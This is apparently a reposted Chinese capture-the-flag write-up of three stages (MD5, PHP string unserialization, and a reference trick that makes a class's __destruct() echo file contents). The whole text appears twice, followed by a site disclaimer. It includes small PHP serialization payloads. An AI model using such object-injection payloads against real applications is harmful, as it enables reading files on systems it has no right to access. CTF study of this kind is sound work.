一共有三小关
第一关:md5加密
第二关:反序列化
重点 单个字符串序列化 unserialize($str) === "$KEY"
<?php
$KEY="YES I love";echo serialize($KEY);
s:10:"YES I love";
第三关: 反序列化
把a的地址赋给b,因为在__destruct()中有echo,可以输出文件内容。
$c=new Clazz();
$c->b=&$c->a;
echo serialize($c);
一共有三小关
第一关:md5加密
第二关:反序列化
重点 单个字符串序列化 unserialize($str) === "$KEY"
<?php
$KEY="YES I love";echo serialize($KEY);
s:10:"YES I love";
第三关: 反序列化
把a的地址赋给b,因为在__destruct()中有echo,可以输出文件内容。
$c=new Clazz();
$c->b=&$c->a;
echo serialize($c);
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/12045.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!